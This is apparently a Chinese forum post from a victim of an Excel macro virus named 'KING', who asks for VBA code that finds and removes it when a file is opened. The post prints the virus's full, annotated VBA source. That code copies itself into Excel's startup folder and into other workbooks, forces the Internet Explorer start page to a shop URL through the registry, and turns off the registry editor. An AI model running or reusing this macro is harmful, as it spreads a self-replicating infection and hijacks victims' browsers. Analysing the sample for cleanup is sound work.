最近打开一个钓鱼网站,打开后发现IE首页被篡改为http://3azu.taobao.com。此外,Excel每次打开都会提示宏被禁用,启用后查看宏,发现加载了两个宏:king.auto_open和king.ck_files。VBA下会建立一个名称为KING的模块。C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下出现了king.xlsh和result.xls两个文件。删除这两个文件后,当前打开的表格不再出现宏,但其他表格中宏又出现了。
通过VBA查看病毒代码如下:
' auto_open: Excel runs a macro with this name automatically when the workbook is
' opened with macros enabled. Here it does one thing: it registers ck_files as the
' Application-wide OnSheetActivate handler, so ck_files runs each time a sheet is activated.
' For triage: an auto_open macro that assigns Application.OnSheetActivate is a simple
' static indicator of this sample.
Sub auto_open()
Application.OnSheetActivate = "ck_files"
End Sub
' ck_files: replication and payload routine of the "KING" macro virus shown in this post.
' It is invoked through Application.OnSheetActivate (set by auto_open and re-set below) and:
'   1. uses two flags to decide whether to save a copy of its "KING" sheet as KING.XLS in
'      Excel's startup folder, or to copy the "KING" sheet into the active workbook;
'   2. on every call, writes the Internet Explorer "Start Page" values and sets the
'      DisableRegistryTools policy value for the current user.
' Indicators visible in this code, useful for triage and clean-up: KING.XLS in
' Application.StartupPath, a hidden sheet named "KING" in workbooks, the two "Start Page"
' registry values, and DisableRegistryTools = 1 under HKEY_CURRENT_USER.
Sub ck_files()
' c$ = Excel's startup folder; workbooks stored there are opened by Excel at launch.
c$ = Application.StartupPath
' Look for an existing KING.XLS in the startup folder.
' NOTE(review): the "" literal is reproduced as posted; the listing may have lost characters here.
m$ = Dir(c$ & "" & "KING.XLS") 'results
' p = 1 when Dir returned exactly "KING.XLS", i.e. the startup copy was found.
If m$ = "KING.XLS" Then p = 1 Else p = 0
' w = 1 when the active workbook reports at least one entry in its Modules collection
' (presumably the legacy module sheet that carries this macro - confirm on a sample).
If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
' Combine both flags into one value: 0, 1, 10 or 11. Only 10 and 1 are acted on below.
whichfile = p + w * 10
Select Case whichfile
Case 10
' whichfile = 10: active workbook has a module but no KING.XLS was found in the startup
' folder -> create the startup copy.
' Screen updating is turned off, so the sheet/workbook changes below are not drawn.
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
' Unhide the "KING" sheet and copy it; Copy with no arguments places the copy in a new
' workbook, which becomes the active workbook.
Sheets("KING").Visible = True
Sheets("KING").Select
Sheets("KING").Copy
' Blank the document properties of the new workbook.
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.name
' Remember the current directory so it can be restored after saving.
c4$ = CurDir()
ChDir Application.StartupPath
' Hide the new workbook's window before saving it.
ActiveWindow.Visible = False
' Save the new workbook as KING.XLS in the startup folder, without passwords or backup.
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
, password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
' Hide the "KING" sheet in the original workbook again.
Workbooks(n4$).Sheets("KING").Visible = False
' Clear the handler, restore screen updating, then point the handler at the startup copy.
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case 1
' whichfile = 1: KING.XLS exists in the startup folder and the active workbook has no
' module -> copy the "KING" sheet into the active workbook.
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
' p4$ is assigned here but not read anywhere else in this listing.
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).name
' Only the name of the first sheet is checked before copying.
If s$ <> "KING" Then
' Insert the "KING" sheet before the first sheet of the active workbook and hide it.
Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("KING").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case Else
' whichfile = 0 or 11: no copy step is performed.
End Select
' The statements below are outside the Select block, so they run on every call.
Dim OperationRegistry
' From here on, run-time errors are ignored and execution continues with the next line.
On Error Resume Next
' WScript.Shell is used only for its RegWrite method.
Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
' Set the Internet Explorer start page machine-wide ...
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
' ... and for the current user.
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
' Set the DisableRegistryTools policy value to 1 for the current user; this policy
' blocks the registry editor, so clean-up has to reset this value as well.
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"
Exit Sub 'on a normal run the procedure exits here
End Sub
能否帮忙用VBA代码写一段语句,在打开Excel文件时自动检测是否有该病毒并将其删除?